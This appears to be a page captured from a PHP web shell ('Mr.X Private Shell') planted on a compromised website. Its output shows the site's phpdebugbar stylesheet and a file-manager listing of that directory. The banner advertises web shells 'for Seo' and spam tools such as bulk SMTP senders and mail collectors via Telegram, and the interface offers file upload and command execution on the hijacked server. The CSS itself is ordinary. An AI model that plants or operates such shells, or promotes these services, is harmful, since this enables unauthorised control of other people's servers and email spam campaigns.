__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
@charset "UTF-8";
@media print {
  div.phpdebugbar {
    display: none;
  }
}

div.phpdebugbar, div.phpdebugbar-openhandler {
  --debugbar-background: #fff;
  --debugbar-background-alt: #fafafa;
  --debugbar-text: #222;
  --debugbar-text-muted: #888;
  --debugbar-border: #eee;
  --debugbar-header: #efefef;
  --debugbar-header-text: #555;
  --debugbar-header-border: #ddd;
  --debugbar-active: #ccc;
  --debugbar-active-text: #666;
  --debugbar-icons: #555;
  --debugbar-badge: #ccc;
  --debugbar-badge-text: #555;
  --debugbar-badge-active: #555;
  --debugbar-badge-active-text: #fff;
  --debugbar-link: #888;
  --debugbar-hover: #aaa;
  --debugbar-accent: #6bb7d8;
  --debugbar-accent-border: #477e96;
  --debugbar-font-sans: ui-sans-serif, system-ui, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
  --debugbar-font-mono: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
}

div.phpdebugbar[data-theme="dark"], div.phpdebugbar-openhandler[data-theme="dark"] {
  --debugbar-background: #2a2a2a;
  --debugbar-background-alt: #333;
  --debugbar-text: #e0e0e0;
  --debugbar-text-muted: #aaa;
  --debugbar-border: #3a3a3a;
  --debugbar-header: #1e1e1e;
  --debugbar-header-text: #ccc;
  --debugbar-header-border: #444;
  --debugbar-active: #444;
  --debugbar-active-text: #e0e0e0;
  --debugbar-icons: #ccc;
  --debugbar-badge: #444;
  --debugbar-badge-text: #ccc;
  --debugbar-badge-active: #ccc;
  --debugbar-badge-active-text: #1e1e1e;
  --debugbar-accent: #4f8fb3;
  --debugbar-accent-border: #3f7a94;
  --debugbar-link: #aaa;
  --debugbar-hover: #888;
}

div.phpdebugbar {
  width: 100%;
  font-family: var(--debugbar-font-sans);
  background: var(--debugbar-background);
  z-index: 2147483647;
  color: var(--debugbar-text);
  text-align: left;
  letter-spacing: normal;
  direction: ltr;
  border-top: 0;
  font-size: 14px;
  line-height: 1.2em;
  position: fixed;
  bottom: 0;
  left: 0;
}

div.phpdebugbar[data-openBtnPosition="bottomRight"].phpdebugbar-closed, div.phpdebugbar[data-openBtnPosition="topRight"].phpdebugbar-closed {
  left: auto;
  right: 0;
}

div.phpdebugbar[data-openBtnPosition="topRight"].phpdebugbar-closed, div.phpdebugbar[data-openBtnPosition="topLeft"].phpdebugbar-closed {
  border-bottom: 1px solid var(--debugbar-header-border);
  top: 0;
  bottom: auto;
}

div.phpdebugbar[data-openBtnPosition="bottomRight"].phpdebugbar-closed, div.phpdebugbar[data-openBtnPosition="bottomLeft"].phpdebugbar-closed {
  border-top: 1px solid var(--debugbar-header-border);
}

.phpdebugbar-closed[data-openBtnPosition="bottomLeft"], .phpdebugbar-closed[data-openBtnPosition="topLeft"] {
  border-right: 1px solid var(--debugbar-header-border);
}

.phpdebugbar-closed[data-openBtnPosition="bottomRight"], .phpdebugbar-closed[data-openBtnPosition="topRight"] {
  border-left: 1px solid var(--debugbar-header-border);
}

div.phpdebugbar a, div.phpdebugbar-openhandler {
  cursor: pointer;
}

div.phpdebugbar-drag-capture {
  z-index: 10001;
  cursor: ns-resize;
  background: none;
  display: none;
  position: fixed;
  inset: 0;
}

div.phpdebugbar-closed {
  width: auto;
}

div.phpdebugbar * {
  clear: initial;
  text-align: left;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  direction: ltr;
  border: 0;
  width: auto;
  margin: 0;
  padding: 0;
  font-weight: normal;
  text-decoration: none;
}

div.phpdebugbar select, div.phpdebugbar input {
  appearance: auto;
}

div.phpdebugbar ol, div.phpdebugbar ul {
  list-style: none;
}

div.phpdebugbar ul li, div.phpdebugbar ol li, div.phpdebugbar dl li {
  line-height: normal;
}

div.phpdebugbar table, .phpdebugbar-openhandler table {
  border-collapse: collapse;
  border-spacing: 0;
  color: inherit;
}

div.phpdebugbar input[type="text"], div.phpdebugbar input[type="password"], div.phpdebugbar select {
  font-family: var(--debugbar-font-sans);
  background: var(--debugbar-background);
  color: var(--debugbar-text);
  border: 1px solid var(--debugbar-border);
  border-radius: .25rem;
  margin: 0;
  padding: 0;
  font-size: 14px;
}

div.phpdebugbar code, div.phpdebugbar pre, div.phpdebugbar samp {
  font-family: var(--debugbar-font-mono);
  background: none;
  margin: 0;
  padding: 0;
  font-size: 1em;
  border: 0 !important;
}

div.phpdebugbar code, div.phpdebugbar pre {
  color: var(--debugbar-text);
}

div.phpdebugbar pre.sf-dump {
  color: #a0a000;
  outline: 0;
  z-index: 0 !important;
  background: none !important;
  display: block !important;
}

div.phpdebugbar pre.sf-dump .sf-dump-private {
  color: gray;
}

div.phpdebugbar[data-theme="dark"] pre.sf-dump .sf-dump-public {
  color: #fc0;
}

div.phpdebugbar[data-theme="dark"] pre.sf-dump .sf-dump-protected {
  color: #a0a000;
}

div.phpdebugbar[data-theme="dark"] pre.sf-dump .sf-dump-private {
  color: #9d9266;
}

a.phpdebugbar-restore-btn {
  float: left;
  color: var(--debugbar-icons);
  padding: 5px 8px;
  font-size: 14px;
  text-decoration: none;
}

div.phpdebugbar-resize-handle {
  border-bottom: 1px solid var(--debugbar-header-border);
  cursor: ns-resize;
  background: none;
  width: 100%;
  height: 4px;
  margin-top: -4px;
  display: none;
}

div.phpdebugbar-minimized {
  border-top: 1px solid var(--debugbar-header-border);
}

a.phpdebugbar-restore-btn:after {
  background: var(--debugbar-header) url("data:image/svg+xml,%3Csvg%20viewBox%3D%220%200%2020%2020%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Ccircle%20fill%3D%22%23000%22%20cx%3D%2210%22%20cy%3D%2210%22%20r%3D%229%22%2F%3E%3Cpath%20d%3D%22M6.039%208.342c.463%200%20.772.084.927.251.154.168.191.455.11.862-.084.424-.247.727-.487.908-.241.182-.608.272-1.1.272h-.743l.456-2.293h.837zm-2.975%204.615h1.22l.29-1.457H5.62c.461%200%20.84-.047%201.139-.142.298-.095.569-.254.812-.477.205-.184.37-.387.497-.608.127-.222.217-.466.27-.734.13-.65.032-1.155-.292-1.518-.324-.362-.84-.543-1.545-.543H4.153l-1.089%205.479zM9.235%206.02h1.21l-.289%201.458h1.079c.679%200%201.147.115%201.405.347.258.231.335.607.232%201.125l-.507%202.55h-1.23l.481-2.424c.055-.276.035-.464-.06-.565-.095-.1-.298-.15-.608-.15H9.98L9.356%2011.5h-1.21l1.089-5.48M15.566%208.342c.464%200%20.773.084.928.251.154.168.19.455.11.862-.084.424-.247.727-.488.908-.24.182-.607.272-1.1.272h-.742l.456-2.293h.836zm-2.974%204.615h1.22l.29-1.457h1.046c.461%200%20.84-.047%201.139-.142.298-.095.569-.254.812-.477.205-.184.37-.387.497-.608.127-.222.217-.466.27-.734.129-.65.032-1.155-.292-1.518-.324-.362-.84-.543-1.545-.543H13.68l-1.089%205.479z%22%20fill%3D%22%23FFF%22%2F%3E%3C%2Fsvg%3E") no-repeat center / 20px 20px;
}

div.phpdebugbar-header {
  background-color: var(--debugbar-header);
  min-height: 32px;
  line-height: 16px;
}

div.phpdebugbar-header:before, div.phpdebugbar-header:after {
  content: "";
  line-height: 0;
  display: table;
}

div.phpdebugbar-header:after {
  clear: both;
}

div.phpdebugbar-header-left {
  float: left;
}

div.phpdebugbar-header-right {
  float: right;
}

div.phpdebugbar-header > div > * {
  height: 22px;
  color: var(--debugbar-header-text);
  padding: 5px;
  font-size: 13px;
  text-decoration: none;
}

div.phpdebugbar-header-left > *, div.phpdebugbar-header-right > * {
  align-items: center;
  line-height: 0;
  display: flex;
}

div.phpdebugbar-header-left > * {
  float: left;
}

div.phpdebugbar-header-right > * {
  float: right;
}

div.phpdebugbar-header-right > select {
  background-color: var(--debugbar-header);
  color: var(--debugbar-header-text);
  padding: 0;
  line-height: 1em;
}

span.phpdebugbar-indicator, a.phpdebugbar-indicator {
  border-right: 1px solid var(--debugbar-header-border);
}

.phpdebugbar[data-hideEmptyTabs="true"] .phpdebugbar-tab[data-empty="true"] {
  display: none;
}

a.phpdebugbar-tab.phpdebugbar-active {
  background: var(--debugbar-active);
  color: var(--debugbar-active-text);
}

a.phpdebugbar-tab .phpdebugbar-text {
  font-size: 14px;
}

a.phpdebugbar-tab span.phpdebugbar-badge {
  background: var(--debugbar-badge);
  color: var(--debugbar-badge-text);
  text-shadow: none;
  border-radius: 4px;
  margin-left: 5px;
  padding: 0 6px;
  font-size: 11px;
  font-weight: normal;
  line-height: 14px;
  display: none;
}

a.phpdebugbar-tab.phpdebugbar-active span.phpdebugbar-badge {
  background: var(--debugbar-badge-active);
  color: var(--debugbar-badge-active-text);
}

a.phpdebugbar-tab i {
  vertical-align: middle;
  display: none;
}

a.phpdebugbar-tab span.phpdebugbar-badge.phpdebugbar-visible {
  display: inline;
}

a.phpdebugbar-tab span.phpdebugbar-badge.phpdebugbar-important {
  color: #fff;
  background: #ed6868;
}

a.phpdebugbar-close-btn, a.phpdebugbar-open-btn, a.phpdebugbar-restore-btn, a.phpdebugbar-minimize-btn, a.phpdebugbar-maximize-btn, a.phpdebugbar-tab.phpdebugbar-tab-history, a.phpdebugbar-tab.phpdebugbar-tab-settings {
  width: 16px;
  height: 22px;
}

a.phpdebugbar-close-btn, a.phpdebugbar-open-btn, a.phpdebugbar-restore-btn, a.phpdebugbar-minimize-btn, a.phpdebugbar-maximize-btn {
  width: 16px;
  height: 22px;
  position: relative;
}

a.phpdebugbar-close-btn:after, a.phpdebugbar-open-btn:after, a.phpdebugbar-restore-btn:after, a.phpdebugbar-minimize-btn:after, a.phpdebugbar-maximize-btn:after {
  background-color: var(--debugbar-icons);
  content: " ";
  width: 100%;
  height: 100%;
  display: block;
  position: absolute;
  top: 0;
  left: 0;
}

a.phpdebugbar-restore-btn:after {
  background-color: var(--debugbar-header);
}

a.phpdebugbar-maximize-btn {
  display: none;
}

a.phpdebugbar-minimize-btn, div.phpdebugbar-minimized a.phpdebugbar-maximize-btn {
  display: block;
}

div.phpdebugbar-minimized a.phpdebugbar-minimize-btn {
  display: none;
}

a.phpdebugbar-minimize-btn:after {
  mask: url("data:image/svg+xml,%3Csvg%20viewBox=%220%200%201792%201792%22%20fill=%22none%22%20xmlns=%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d=%22m1683%20653.5-742%20741c-12.667%2012.67-27.667%2019-45%2019s-32.333-6.33-45-19l-742-741c-12.667-12.667-19-27.833-19-45.5s6.333-32.833%2019-45.5l166-165c12.667-12.667%2027.667-19%2045-19s32.333%206.333%2045%2019l531%20531%20531-531c12.67-12.667%2027.67-19%2045-19s32.33%206.333%2045%2019l166%20165c12.67%2012.667%2019%2027.833%2019%2045.5s-6.33%2032.833-19%2045.5Z%22%20fill=%22%23555000%22%2F%3E%3C%2Fsvg%3E") center / 14px 14px no-repeat;
}

a.phpdebugbar-maximize-btn:after {
  mask: url("data:image/svg+xml,%3Csvg%20viewBox=%220%200%201792%201792%22%20fill=%22none%22%20xmlns=%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d=%22m1683%201229.5-166%20165c-12.67%2012.67-27.67%2019-45%2019s-32.33-6.33-45-19l-531-531-531%20531c-12.667%2012.67-27.667%2019-45%2019s-32.333-6.33-45-19l-166-165c-12.667-12.67-19-27.83-19-45.5s6.333-32.83%2019-45.5l742-741c12.667-12.667%2027.667-19%2045-19s32.333%206.333%2045%2019l742%20741c12.67%2012.67%2019%2027.83%2019%2045.5s-6.33%2032.83-19%2045.5Z%22%20fill=%22%23000%22%2F%3E%3C%2Fsvg%3E") center / 14px 14px no-repeat;
}

a.phpdebugbar-close-btn:after {
  mask: url("data:image/svg+xml,%3Csvg%20viewBox=%220%200%201792%201792%22%20fill=%22none%22%20xmlns=%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d=%22M1490%201258c0%2026.67-9.33%2049.33-28%2068l-136%20136c-18.67%2018.67-41.33%2028-68%2028s-49.33-9.33-68-28l-294-294-294%20294c-18.667%2018.67-41.333%2028-68%2028s-49.333-9.33-68-28l-136-136c-18.667-18.67-28-41.33-28-68s9.333-49.33%2028-68l294-294-294-294c-18.667-18.667-28-41.333-28-68s9.333-49.333%2028-68l136-136c18.667-18.667%2041.333-28%2068-28s49.333%209.333%2068%2028l294%20294%20294-294c18.67-18.667%2041.33-28%2068-28s49.33%209.333%2068%2028l136%20136c18.67%2018.667%2028%2041.333%2028%2068s-9.33%2049.333-28%2068l-294%20294%20294%20294c18.67%2018.67%2028%2041.33%2028%2068Z%22%20fill=%22%23000%22%2F%3E%3C%2Fsvg%3E") center / 14px 14px no-repeat;
}

a.phpdebugbar-open-btn:after {
  mask: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='none' viewBox='0 0 1792 1792'%3e%3cpath fill='%23000' d='M1646 991.796c0 16.494-8.25 34.064-24.75 52.684l-268.22 316.13c-22.89 27.14-54.95 50.16-96.2 69.05S1177.4 1458 1142.27 1458H273.728c-18.095 0-34.194-3.46-48.297-10.38-14.104-6.92-21.155-18.36-21.155-34.32 0-16.5 8.249-34.06 24.747-52.69l268.228-316.13c22.884-27.14 54.949-50.156 96.194-69.049 41.246-18.893 79.431-28.34 114.556-28.34h868.549c18.09 0 34.19 3.459 48.3 10.378 14.1 6.918 21.15 18.361 21.15 34.327Zm-273.82-274.615v127.728H708.001c-50.027 0-102.448 12.64-157.264 37.919-54.817 25.28-98.457 57.078-130.921 95.397L150.79 1294.35l-3.992 4.79c0-2.13-.133-5.46-.399-9.98-.266-4.52-.399-7.85-.399-9.98V512.817c0-48.962 17.563-91.005 52.688-126.13 35.125-35.126 77.168-52.688 126.131-52.688h255.455c48.962 0 91.005 17.562 126.13 52.688 35.126 35.125 52.688 77.168 52.688 126.13v25.546h434.278c48.96 0 91 17.563 126.13 52.688 35.12 35.125 52.68 77.168 52.68 126.13Z'/%3e%3c/svg%3e") center / 14px 14px no-repeat;
}

.phpdebugbar-indicator {
  cursor: pointer;
  position: relative;
}

.phpdebugbar-indicator span.phpdebugbar-text {
  margin-left: 5px;
}

.phpdebugbar-indicator span.phpdebugbar-tooltip {
  background: var(--debugbar-header);
  border: 1px solid var(--debugbar-header-border);
  color: var(--debugbar-header-text);
  z-index: 1000;
  text-align: center;
  white-space: nowrap;
  -webkit-backdrop-filter: blur(5px);
  padding: 2px 6px;
  font-size: 11px;
  line-height: 1.5;
  display: none;
  position: absolute;
  bottom: 38px;
  right: 0;
}

.phpdebugbar-indicator:hover span.phpdebugbar-tooltip:not(.phpdebugbar-disabled) {
  display: block;
}

.phpdebugbar-indicator span.phpdebugbar-tooltip dl {
  grid-gap: 4px 10px;
  grid-template-columns: max-content;
  display: grid;
}

.phpdebugbar-indicator span.phpdebugbar-tooltip dl dt {
  text-align: left;
  font-weight: bold;
}

.phpdebugbar-indicator span.phpdebugbar-tooltip dl dd {
  text-align: left;
  grid-column-start: 2;
  margin: 0;
}

.phpdebugbar select.phpdebugbar-datasets-switcher {
  float: right;
  border: none;
  max-width: 200px;
  height: 22px;
  padding: 4px 0;
  display: none;
}

.phpdebugbar button, .phpdebugbar-openhandler button {
  color: var(--debugbar-header-text);
  background-color: var(--debugbar-header);
  border: 1px solid var(--debugbar-header-border);
  cursor: pointer;
  border-radius: .25rem;
  height: 20px;
  margin: 0 5px;
  padding: 0 12px;
  line-height: normal;
}

div.phpdebugbar-body {
  border-top: 1px solid var(--debugbar-header-border);
  height: 300px;
  display: none;
  position: relative;
}

div.phpdebugbar-panel {
  width: 100%;
  height: 100%;
  display: none;
  overflow: auto;
}

div.phpdebugbar-panel.phpdebugbar-active {
  display: block;
}

div.phpdebugbar-mini-design a.phpdebugbar-tab {
  border-right: 1px solid var(--debugbar-header-border);
  position: relative;
}

div.phpdebugbar-mini-design a.phpdebugbar-tab span.phpdebugbar-text {
  display: none;
}

div.phpdebugbar-mini-design a.phpdebugbar-tab:hover span.phpdebugbar-text {
  background: var(--debugbar-background);
  opacity: 1;
  border: 1px solid var(--debugbar-header-border);
  color: var(--debugbar-header-text);
  z-index: 1000;
  text-align: center;
  -webkit-backdrop-filter: blur(5px);
  padding: 2px 6px;
  font-size: 11px;
  line-height: 1.5;
  display: block;
  position: absolute;
  top: -30px;
  right: 0;
}

div.phpdebugbar-mini-design a.phpdebugbar-tab i {
  display: inline-block;
}

a.phpdebugbar-tab.phpdebugbar-tab-history {
  width: auto;
  min-width: 22px;
}

a.phpdebugbar-tab.phpdebugbar-tab-history, a.phpdebugbar-tab.phpdebugbar-tab-settings {
  justify-content: center;
  align-items: center;
  display: flex;
}

a.phpdebugbar-tab.phpdebugbar-tab-history .phpdebugbar-text, a.phpdebugbar-tab.phpdebugbar-tab-settings .phpdebugbar-text {
  white-space: nowrap;
  display: none;
}

a.phpdebugbar-tab.phpdebugbar-tab-history i, a.phpdebugbar-tab.phpdebugbar-tab-settings i {
  display: inline-block;
}

.phpdebugbar-widgets-dataset-history table {
  table-layout: fixed;
  width: 100%;
}

.phpdebugbar-widgets-dataset-history table th {
  font-weight: bold;
}

.phpdebugbar-widgets-dataset-history table td, .phpdebugbar-widgets-dataset-history table th {
  border-bottom: 1px solid var(--debugbar-border);
  text-overflow: ellipsis;
  white-space: nowrap;
  padding: 6px 3px;
  overflow: hidden;
}

.phpdebugbar-widgets-dataset-history table td a {
  white-space: nowrap;
  text-overflow: ellipsis;
  overflow: hidden;
}

.phpdebugbar-widgets-dataset-history table tr.phpdebugbar-widgets-active {
  background: var(--debugbar-active);
  color: var(--debugbar-active-text);
}

.phpdebugbar-widgets-dataset-history span.phpdebugbar-badge {
  background: var(--debugbar-badge);
  color: var(--debugbar-badge-text);
  text-shadow: none;
  vertical-align: middle;
  border-radius: 4px;
  margin: 0 5px 0 2px;
  padding: 0 6px;
  font-size: 11px;
  font-weight: normal;
  line-height: 14px;
}

.phpdebugbar-widgets-dataset-history .phpdebugbar-widgets-dataset-actions {
  text-align: center;
  background: var(--debugbar-background);
  padding: 7px 0;
  position: sticky;
  top: 0;
}

.phpdebugbar-widgets-dataset-history .phpdebugbar-widgets-dataset-actions a {
  margin: 0 10px;
}

.phpdebugbar-widgets-dataset-history .phpdebugbar-widgets-dataset-actions input {
  margin: 5px;
}

.phpdebugbar-settings .phpdebugbar-form-row {
  border-top: 1px solid var(--debugbar-border);
  min-height: 17px;
  padding: 5px 10px;
  display: block;
}

.phpdebugbar-settings .phpdebugbar-form-label {
  clear: none;
  width: 200px;
  font-weight: bold;
  display: inline-block;
}

.phpdebugbar-settings .phpdebugbar-form-input {
  clear: none;
  font-weight: bold;
  display: inline-block;
}

.phpdebugbar-settings input[type="text"], .phpdebugbar-settings select {
  min-width: 200px;
  margin: 0 5px;
}

.phpdebugbar-settings input[type="checkbox"] {
  margin: 0 5px;
}

Filemanager

Name Type Size Permission Actions
vendor Folder 0775
widgets Folder 0775
debugbar.css File 17.45 KB 0664
debugbar.js File 48.49 KB 0664
debugbar.min.css File 15.63 KB 0664
debugbar.min.css.gz File 3.94 KB 0664
debugbar.min.js File 18.99 KB 0664
debugbar.min.js.gz File 5.41 KB 0664
openhandler.css File 7.61 KB 0664
openhandler.js File 7.23 KB 0664
openhandler.min.css File 7.26 KB 0664
openhandler.min.css.gz File 4.36 KB 0664
openhandler.min.js File 3.79 KB 0664
openhandler.min.js.gz File 1.32 KB 0664
widgets.css File 10.11 KB 0664
widgets.js File 37.14 KB 0664
widgets.min.css File 9 KB 0664
widgets.min.css.gz File 1.66 KB 0664
widgets.min.js File 15.6 KB 0664
widgets.min.js.gz File 4.7 KB 0664
Filemanager